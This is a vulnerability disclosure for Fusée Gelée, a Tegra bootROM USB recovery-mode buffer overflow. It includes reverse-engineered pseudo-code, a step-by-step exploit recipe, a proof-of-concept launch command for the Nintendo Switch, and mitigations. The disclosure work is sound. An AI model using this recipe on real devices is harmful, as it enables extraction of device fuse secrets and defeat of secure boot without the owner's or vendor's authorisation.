mirror of
https://github.com/Qyriad/fusee-launcher.git
synced 2024-11-22 03:49:17 +01:00
490 lines
23 KiB
Markdown
490 lines
23 KiB
Markdown
## Vulnerability Disclosure: Fusée Gelée
|
|
|
|
This report documents Fusée Gelée, a coldboot vulnerability that allows full,
|
|
unauthenticated arbitrary code execution from an early bootROM context via Tegra
|
|
Recovery Mode (RCM) on NVIDIA's Tegra line of embedded processors. As this
|
|
vulnerability allows arbitrary code execution on the Boot and Power Management
|
|
Processor (BPMP) before any lock-outs take effect, this vulnerability compromises
|
|
the entire root-of-trust for each processor, and allows exfiltration of secrets
|
|
e.g. burned into device fuses.
|
|
|
|
Quick vitals: | |
|
|
--------------------|--------------------------------------------------------
|
|
*Reporter:* | Katherine Temkin (@ktemkin)
|
|
*Affiliation:* | ReSwitched (https://reswitched.tech)
|
|
*E-mail:* | k@ktemkin.com
|
|
*Affects:* | Tegra SoCs, independent of software stack
|
|
*Versions:* | believed to affect Tegra SoCs released prior to the T186 / X2
|
|
*Impact:* | early bootROM code execution with no software requirements, which can lead to full compromise of on-device secrets where USB access is possible
|
|
*Disclosure* | public disclosure planned for June 15th, 2018
|
|
|
|
#### Vulnerability Summary
|
|
|
|
The USB software stack provided inside the boot instruction rom (IROM/bootROM)
|
|
contains a copy operation whose length can be controlled by an attacker. By
|
|
carefully constructing a USB control request, an attacker can leverage this
|
|
vulnerability to copy the contents of an attacker-controlled buffer over the
|
|
active execution stack, gaining control of the Boot and Power Management
|
|
processor (BPMP) before any lock-outs or privilege reductions occur. This
|
|
execution can then be used to exfiltrate secrets and to load arbitrary code onto
|
|
the main CPU Complex (CCPLEX) "application processors" at the highest possible
|
|
level of privilege (typically as the TrustZone Secure Monitor at PL3/EL3).
|
|
|
|
|
|
#### Public Disclosure Notice
|
|
|
|
This vulnerability is notable due to the significant number and variety of
|
|
devices affected, the severity of the issue, and the immutability of the relevant
|
|
code on devices already delivered to end users. This vulnerability report
|
|
is provided as a courtesy to help aid remediation efforts, guide communication,
|
|
and minimize impact to users.
|
|
|
|
As other groups appear to have this or an equivalent exploit--
|
|
[including a group who claims they will be selling access to an implementation of such an exploit](http://team-xecuter.com/team-xecuter-coming-to-your-nintendo-switch-console/)--
|
|
it is the author and the ReSwitched team's belief that prompt public disclosure
|
|
best serves the public interest. By minimizing the information asymmetry between
|
|
the general public and exploit-holders and notifying the public, users will be
|
|
able to best assess how this vulnerability impacts their personal threat models.
|
|
|
|
Accordingly, ReSwitched anticipates public disclosure of this vulnerability:
|
|
* If another group releases an implementation of the identified
|
|
vulnerability; or
|
|
* On June 15th, 2018, whichever comes first.
|
|
|
|
### Vulnerability Details
|
|
|
|
The core of the Tegra boot process is approximated by the following block of
|
|
pseudo-code, as obtained by reverse-engineering an IROM extracted from a
|
|
vulnerable T210 system:
|
|
|
|
```C
|
|
// If this is a warmboot (from "sleep"), restore the saved state from RAM.
|
|
if (read_scratch0_bit(1)) {
|
|
restore_warmboot_image(&load_addr);
|
|
}
|
|
// Otherwise, bootstrap the processor.
|
|
else
|
|
{
|
|
// Allow recovery mode to be forced by a PMC scratch bit or physical straps.
|
|
force_recovery = check_for_rcm_straps() || read_scratch0_bit(2);
|
|
|
|
// Determine whether to use USB2 or USB3 for RCM.
|
|
determine_rcm_usb_version(&usb_version);
|
|
usb_ops = set_up_usb_ops(usb_version);
|
|
usb_ops->initialize();
|
|
|
|
// If we're not forcing recovery, attempt to load an image from boot media.
|
|
if (!force_recovery)
|
|
{
|
|
// If we succeeded, don't fall back into recovery mode.
|
|
if (read_boot_configuration_and_images(&load_addr) == SUCCESS) {
|
|
goto boot_complete;
|
|
}
|
|
}
|
|
|
|
// In all other conditions
|
|
if (read_boot_images_via_usb_rcm(<snip>, &load_addr) != SUCCESS) {
|
|
/* load address is poisoned here */
|
|
}
|
|
}
|
|
|
|
boot_complete:
|
|
/* apply lock-outs, and boot the program at address load_address */
|
|
```
|
|
|
|
Tegra processors include a USB Recovery Mode (RCM), which we can observe to be activated under a number of conditions:
|
|
* If the processor fails to find a valid Boot Control Table (BCT) + bootloader on its boot media;
|
|
* If processor straps are pulled to a particular value e.g. by holding a button combination; or
|
|
* If the processor is rebooted after a particular value is written into a power management controller scratch register.
|
|
|
|
USB recovery mode is present in all devices, including devices that have been
|
|
production secured. To ensure that USB recovery mode does not allow unauthenticated
|
|
communications, RCM requires all recovery commands be signed using either RSA
|
|
or via AES-CMAC.
|
|
|
|
The bootloader's implementation of the Tegra RCM protocol is simple, and exists
|
|
to allow loading a small piece of code (called the *miniloader* or *applet*) into
|
|
the bootloader's local Instruction RAM (IRAM). In a typical application, this
|
|
*applet* is `nvtboot-recovery`, a stub which allows further USB communications to
|
|
bootstrap a system or to allow system provisioning.
|
|
|
|
The RCM process is approximated by the following pseudo-code, again obtained via
|
|
reverse engineering a dumped IROM from a T210:
|
|
|
|
```C
|
|
// Significantly simplified for clarity, with error checking omitted where unimportant.
|
|
while (1) {
|
|
// Repeatedly handle USB standard events on the control endpoint EP0.
|
|
usb_ops->handle_control_requests(current_dma_buffer);
|
|
|
|
// Try to send the device ID over the main USB data pipe until we succeed.
|
|
if ( rcm_send_device_id() == USB_NOT_CONFIGURED ) {
|
|
usb_initialized = 0;
|
|
}
|
|
// Once we've made a USB connection, accept RCM commands on EP1.
|
|
else {
|
|
usb_initialized = 1;
|
|
|
|
// Read a full RCM command and any associated payload into a global buffer.
|
|
// (Error checking omitted for brevity.)
|
|
rcm_read_command_and_payload();
|
|
|
|
// Validate the received RCM command; e.g. by checking for signatures
|
|
// in RSA or AES_CMAC mode, or by trivially succeeding if we're not in
|
|
// a secure mode.
|
|
rc = rcm_validate_command();
|
|
if (rc != VALIDATION_PASS) {
|
|
return rc;
|
|
}
|
|
|
|
// Handle the received and validated command.
|
|
// For a "load miniloader" command, this sanity checks the (validated)
|
|
// miniloader image and takes steps to prevent re-use of signed data not
|
|
// intended to be used as an RCM command.
|
|
rcm_handle_command_complete(...);
|
|
}
|
|
}
|
|
```
|
|
|
|
It is important to note that a full RCM command *and its associated payload*
|
|
are read into 1) a global buffer, and 2) the target load address, respectively,
|
|
before any signature checking is done. This effectively grants the attacker a
|
|
narrow window in which they control a large region of unvalidated memory.
|
|
|
|
The largest vulnerability surface area occurs in the `rcm_read_command_and_payload`
|
|
function, which accepts the RCM command and payload packets via a USB bulk endpoint.
|
|
For our purposes, this endpoint is essentially a simple pipe for conveyance
|
|
of blocks of binary data separate from standard USB communications.
|
|
|
|
The `rcm_read_command_and_payload` function actually contains several issues--
|
|
of which exactly one is known to be exploitable:
|
|
|
|
```C
|
|
uint32_t total_rxd = 0;
|
|
uint32_t total_to_rx = 0x400;
|
|
|
|
// Loop until we've received our full command and payload.
|
|
while (total_rxd < total_to_rx) {
|
|
// Switch between two DMA buffers, so the USB is never DMA'ing into the same
|
|
// buffer that we're processing.
|
|
active_buffer = next_buffer;
|
|
next_buffer = switch_dma_buffers();
|
|
|
|
// Start a USB DMA transaction on the RCM bulk endpoint, which will hopefully
|
|
// receive data from the host in the background as we copy.
|
|
usb_ops->start_nonblocking_bulk_read(active_buffer, 0x1000);
|
|
|
|
// If we're in the first 680-bytes we're receiving, this is part of the RCM
|
|
// command, and we should read it into the command buffer.
|
|
if ( total_rxd < 680 ) {
|
|
/* copy data from the DMA buffer into the RCM command buffer until we've
|
|
read a full 680-byte RCM command */
|
|
|
|
// Once we've received the first four bytes of the RCM command,
|
|
// use that to figure out how much data should be received.
|
|
if ( total_rxd >= 4 )
|
|
{
|
|
// validate:
|
|
// -- the command won't exceed our total RAM
|
|
// (680 here, 0x30000 in upper IRAM)
|
|
// -- the command is >= 0x400 bytes
|
|
// -- the size ends in 8
|
|
if ( rcm_command_buffer[0] >= 0x302A8u
|
|
|| rcm_command_buffer[0] < 0x400u
|
|
|| (rcm_command_buffer[0] & 0xF) != 8 ) {
|
|
return ERROR_INVALID_SIZE;
|
|
} else {
|
|
left_to_rx = *((uint32_t *)rcm_command_buffer);
|
|
}
|
|
}
|
|
}
|
|
|
|
/* copy any data _past_ the command into a separate payload
|
|
buffer at 0x40010000 */
|
|
/* -code omitted for brevity - */
|
|
|
|
// Wait for the DMA transaction to complete.
|
|
// [This is, again, simplified to convey concepts.]
|
|
while(!usb_ops->bulk_read_complete()) {
|
|
|
|
// While we're blocking, it's still important that we respond to standard
|
|
// USB packets on the control endpoint, so do that here.
|
|
usb_ops->handle_control_requests(next_buffer);
|
|
}
|
|
}
|
|
```
|
|
|
|
Astute readers will notice an issue unrelated to the Fusée Gelée exploit: this
|
|
code fails to properly ensure DMA buffers are being used exclusively for a single
|
|
operation. This results in an interesting race condition in which a DMA buffer
|
|
can be simultaneously used to handle a control request and a RCM bulk transfer.
|
|
This can break the flow of RCM, but as both operations contain untrusted data,
|
|
this issue poses no security risk.
|
|
|
|
To find the actual vulnerability, we must delve deeper, into the code that handles
|
|
standard USB control requests. The core of this code is responsible for responding
|
|
to USB control requests. A *control request* is initiated when the host sends a
|
|
setup packet, of the following form:
|
|
|
|
Field | Size | Description
|
|
----------|:----:|-----
|
|
direction | 1b | if '1', the device should respond with data
|
|
type | 2b | specifies whether this request is of a standard type or not
|
|
recipient | 5b | encodes the context in which this request should be considered; <br /> for example, is this about a `DEVICE` or about an `ENDPOINT`?
|
|
request | 8b | specifies the request number
|
|
value | 16b | argument to the request
|
|
index | 16b | argument to the request
|
|
length | 16b | specifies the maximum amount of data to be transferred
|
|
|
|
As an example, the host can request the status of a device by issuing a
|
|
`GET_STATUS` request, at which point the device would be expected to respond with
|
|
a short setup packet. Of particular note is the `length` field of the request,
|
|
which should *limit* -- but not exclusively determine-- the *maximum* amount of
|
|
data that should be included in the response. Per the specification, the device
|
|
should respond with either the *amount of data specified* or the *amount of data
|
|
available*, whichever is less.
|
|
|
|
The bootloader's implementation of this behavior is conceptually implemented as
|
|
follows:
|
|
|
|
```C
|
|
|
|
// Temporary, automatic variables, located on the stack.
|
|
uint16_t status;
|
|
void *data_to_tx;
|
|
|
|
// The amount of data available to transmit.
|
|
uint16_t size_to_tx = 0;
|
|
|
|
// The amount of data the USB host requested.
|
|
uint16_t length_read = setup_packet.length;
|
|
|
|
/* Lots of handler cases have omitted for brevity. */
|
|
|
|
// Handle GET_STATUS requests.
|
|
if (setup_packet.request == REQUEST_GET_STATUS)
|
|
{
|
|
// If this is asking for the DEVICE's status, respond accordingly.
|
|
if(setup_packet.recipient == RECIPIENT_DEVICE) {
|
|
status = get_usb_device_status();
|
|
size_to_tx = sizeof(status);
|
|
}
|
|
// Otherwise, respond with the ENDPOINT status.
|
|
else if (setup_packet.recipient == RECIPIENT_ENDPOINT){
|
|
status = get_usb_endpoint_status(setup_packet.index);
|
|
size_to_tx = length_read; // <-- This is a critical error!
|
|
}
|
|
else {
|
|
/* ... */
|
|
}
|
|
|
|
// Send the status value, which we'll copy from the stack variable 'status'.
|
|
data_to_tx = &status;
|
|
}
|
|
|
|
// Copy the data we have into our DMA buffer for transmission.
|
|
// For a GET_STATUS request, this copies data from the stack into our DMA buffer.
|
|
memcpy(dma_buffer, data_to_tx, size_to_tx);
|
|
|
|
// If the host requested less data than we have, only send the amount requested.
|
|
// This effectively selects min(size_to_tx, length_read).
|
|
if (length_read < size_to_tx) {
|
|
size_to_tx = length_read;
|
|
}
|
|
|
|
// Transmit the response we've constructed back to the host.
|
|
respond_to_control_request(dma_buffer, length_to_send);
|
|
```
|
|
|
|
In most cases, the handler correctly limits the length of the transmitted
|
|
responses to the amount it has available, per the USB specification. However,
|
|
in a few notable cases, the length is *incorrectly always set to the amount
|
|
requested* by the host:
|
|
* When issuing a `GET_CONFIGURATION` request with a `DEVICE` recipient.
|
|
* When issuing a `GET_INTERFACE` request with a `INTERFACE` recipient.
|
|
* When issuing a `GET_STATUS` request with a `ENDPOINT` recipient.
|
|
|
|
This is a critical security error, as the host can request up to 65,535 bytes per
|
|
control request. In cases where this is loaded directly into `size_to_tx`, this
|
|
value directly sets the extent of the `memcpy` that follows-- and thus can copy
|
|
up to 65,535 bytes into the currently selected `dma_buffer`. As the DMA buffers
|
|
used for the USB stack are each comparatively short, this can result in a _very_
|
|
significant buffer overflow.
|
|
|
|
To validate that the vulnerability is present on a given device, one can try
|
|
issuing an oversized request and watch as the device responds. Pictured below is
|
|
the response generated when sending a oversized `GET_STATUS` control request
|
|
with an `ENDPOINT` recipient to a T124:
|
|
|
|
![Reading a chunk of stack memory from a K1](stack_read.png)
|
|
|
|
A compliant device should generate a two-byte response to a `GET_STATUS` request--
|
|
but the affected Tegra responds with significantly longer response. This is a clear
|
|
indication that we've run into the vulnerability described above.
|
|
|
|
To really understand the impact of this vulnerability, it helps to understand
|
|
the memory layout used by the bootROM. For our proof-of-concept, we'll consider
|
|
the layout used by the T210 variant of the affected bootROM:
|
|
|
|
![Bootrom memory layout](mem_layout.png)
|
|
|
|
The major memory regions relevant to this vulnerability are as follows:
|
|
* The bootROM's *execution stack* grows downward from `0x40010000`; so the
|
|
execution stack is located in the memory *immediately preceding* that address.
|
|
* The DMA buffers used for USB are located at `0x40005000` and `0x40009000`,
|
|
respectively. Because the USB stack alternates between these two buffers
|
|
once per USB transfer, the host effectively can control which DMA buffer
|
|
is in use by sending USB transfers.
|
|
* Once the bootloader's RCM code receives a 680-byte command, it begins to store
|
|
received data in a section of upper IRAM located at address `0x40010000`, and can
|
|
store up to `0x30000` bytes of payload. This address is notable, as it is immediately
|
|
past the end of the active execution stack.
|
|
|
|
Of particular note is the adjacency of the bootROM's *execution stack* and the
|
|
attacker-controlled *RCM payload*. Consider the behavior of the previous pseudo-code
|
|
segment on receipt of a `GET_STATUS` request to the `ENDPOINT` with an
|
|
excessive length. The resulting memcpy:
|
|
* copies *up to* 65,535 bytes total;
|
|
* sources data from a region *starting at the status variable on the stack*
|
|
and extending significantly past the stack -- effectively copying mostly
|
|
*from the attacker-controllable RCM payload buffer*
|
|
* targets a buffer starting either `0x40005000` or `0x40009000`, at the
|
|
attacker's discretion, reaching addresses of up to `0x40014fff` or `0x40018fff`
|
|
|
|
This is a powerful copy primitive, as it copies *from attacker controlled memory*
|
|
and into a region that *includes the entire execution stack*:
|
|
|
|
![Effect of the vulnerability memcpy](copy_span.png)
|
|
|
|
This would be a powerful exploit on any platform; but this is a particularly devastating
|
|
attack in the bootROM environment, which does not:
|
|
* Use common attack mitigations such as stack canaries, ostensibly to reduce
|
|
complexity and save limited IRAM and IROM space.
|
|
* Apply memory protections, so the entire stack and all attacker
|
|
controlled buffers can be read from, written to, and executed from.
|
|
* Employ typical 'application-processor' mitigation strategies such as ASLR.
|
|
|
|
Accordingly, we now have:
|
|
1. The capability to load arbitrary payloads into memory via RCM, as RCM only
|
|
validates command signatures once payload receipt is complete.
|
|
2. The ability to copy attacker-controlled values over the execution stack,
|
|
overwriting return addresses and redirecting execution to a location of our
|
|
choice.
|
|
|
|
Together, these two abilities give us a full arbitrary-code execution exploit at
|
|
a critical point in the Tegra's start-up process. As control flow is hijacked
|
|
before return from `read_boot_images_via_usb_rcm`, none of the "lock-out"
|
|
operations that precede normal startup are executed. This means, for example,
|
|
that the T210 fuses-- and the keydata stored within them-- are accessible from
|
|
the attack payload, and the bootROM is not yet protected.
|
|
|
|
#### Exploit Execution
|
|
|
|
The Fusée Launcher PoC exploits the vulnerability described on the T210 via a
|
|
careful sequence of interactions:
|
|
1. The device is started in RCM mode. Device specifics will differ, but this
|
|
is often via a key-combination held on startup.
|
|
2. A host computer is allowed to enumerate the RCM device normally.
|
|
3. The host reads the RCM device's ID by reading 16 bytes from the EP1 IN.
|
|
4. The host builds an exploit payload, which is comprised of:
|
|
1. An RCM command that includes a maximum length, ensuring that we can send
|
|
as much payload as possible without completing receipt of the RCM payload.
|
|
Only the length of this command is used prior to validation; so we can
|
|
submit an RCM command that starts with a maximum length of 0x30298, but
|
|
which fills the remaining 676 bytes of the RCM command with any value.
|
|
2. A set of values with which to overwrite the stack. As stack return address
|
|
locations vary across the series, it's recommended that a large block
|
|
composed of a single entry-point address be repeated a significant number
|
|
of times, so one can effectively replace the entire stack with that address.
|
|
3. The program to be executed ("final payload") is appended, ensuring that its
|
|
position in the binary matches the entry-point from the previous step.
|
|
4. The payload is padded to be evenly divisible by the 0x1000 block size to
|
|
ensure the active block is not overwritten by the "DMA dual-use" bug
|
|
described above.
|
|
5. The exploit payload is sent to the device over EP1 OUT, tracking the number of
|
|
0x1000-byte "blocks" that have been sent to the device. If this number is _even_,
|
|
the next write will be issued to the lower DMA buffer (`0x40005000`); otherwise,
|
|
it will be issued to the upper DMA buffer (`0x40009000`).
|
|
6. If the next write would target the lower DMA buffer, issue another write
|
|
of a full 0x1000 bytes to move the target to the upper DMA buffer, reducing
|
|
the total amount of data to be copied.
|
|
7. Trigger the vulnerable memcpy by sending a `GET_STATUS` `IN` control
|
|
request with an `ENDPOINT` recipient, and a length long enough to smash the
|
|
desired stack region, and preferably not longer than required.
|
|
|
|
A simple host program that triggers this vulnerability is included with this
|
|
report: see `fusee-launcher.py`. Note the restrictions on its function in the
|
|
following section.
|
|
|
|
|
|
### Proof of Concept
|
|
|
|
Included with this report is a set of three files:
|
|
* `fusee-launcher.py` -- The main proof-of-concept accompanying this report.
|
|
This python script is designed to launch a simple binary payload in the
|
|
described bootROM context via the exploit.
|
|
* `intermezzo.bin` -- This small stub is designed to relocate a payload from
|
|
a higher load address to the standard RCM load address of `0x40010000`. This
|
|
allows standard RCM payloads (such as `nvtboot-recover.bin`) to be executed.
|
|
* `fusee.bin` -- An example payload for the Nintendo Switch, a representative
|
|
and well-secured device based on a T210. This payload will print information
|
|
from the device's fuses and protected IROM to the display, demonstrating that
|
|
early bootROM execution has been achieved.
|
|
|
|
**Support note:** Many host-OS driver stacks are reluctant to issue unreasonably
|
|
large control requests. Accordingly, the current proof-of-concept includes code
|
|
designed to work in the following environments:
|
|
* **64-bit linux via `xhci_hcd`**. The proof-of-concept can manually submit
|
|
large control requests, but does not work with the common `ehci_hcd` drivers
|
|
due to driver limitations. A rough rule of thumb is that a connection via a
|
|
blue / USB3 SuperSpeed port will almost always be handled by `xhci_hcd`.
|
|
* **macOS**. The exploit works out of the box with no surprises or restrictions
|
|
on modern macOS.
|
|
|
|
Windows support would require addition of a custom kernel module, and thus was
|
|
beyond the scope of a simple proof-of-concept.
|
|
|
|
To use this proof-of-concept on a Nintendo Switch:
|
|
1. Set up an Linux or macOS environment that meets the criteria above, and
|
|
which has a working `python3` and `pyusb` as well as `libusb` installed.
|
|
2. Connect the Switch to your host PC with a USB A -> USB C cable.
|
|
3. Boot the Switch in RCM mode. There are three ways to do this, but the first--
|
|
unseating its eMMC board-- is likely the most straightforward:
|
|
1. Ensure the Switch cannot boot off its eMMC. The most straightforward way to
|
|
to this is to open the back cover and remove the socketed eMMC board; corrupting
|
|
the BCT or bootloader on the eMMC boot partition would also work.
|
|
2. Trigger the RCM straps. Hold VOL_UP and short pin 10 on the right
|
|
JoyCon connector to ground while engaging the power button.
|
|
3. Set bit 2 of PMC scratch register zero. On modern firmwares, this requires
|
|
EL3 or pre-sleep BPMP execution.
|
|
4. Run the `fusee-launcher.py` with an argument of `fusee.bin`. (This requires
|
|
`intermezzo.bin` to be located in the same folder as `fusee-launcher.py`.)
|
|
|
|
```
|
|
sudo python3 ./fusee-launcher.py fusee.bin
|
|
```
|
|
|
|
If everything functions correctly, your Switch should be displaying a collection
|
|
of fuse and protected-IROM information:
|
|
|
|
![exploit working](switch_hax.jpg)
|
|
|
|
|
|
### Recommended Mitigations
|
|
|
|
In this case, the recommended mitigation is to correct the USB control request
|
|
handler such that it always correctly constrains the length to be transmitted.
|
|
This has to be handled according to the type of device:
|
|
* **For a device already in consumer hands**, no solution is proposed.
|
|
Unfortunately, access to the fuses needed to configure the device's ipatches
|
|
was blocked when the ODM_PRODUCTION fuse was burned, so no bootROM update
|
|
is possible. It is suggested that consumers be made aware of the situation
|
|
so they can move to other devices, where possible.
|
|
* **For new devices**, the correct solution is likely to introduce an
|
|
new ipatch or new ipatches that limits the size of control request responses.
|
|
|
|
It seems likely that OEMs producing T210-based devices may move to T214 solutions;
|
|
it is the hope of the author that the T214's bootROM shares immunity with
|
|
the T186. If not, patching the above is a recommended modification to the mask ROM
|
|
and/or ipatches of the T214, as well.
|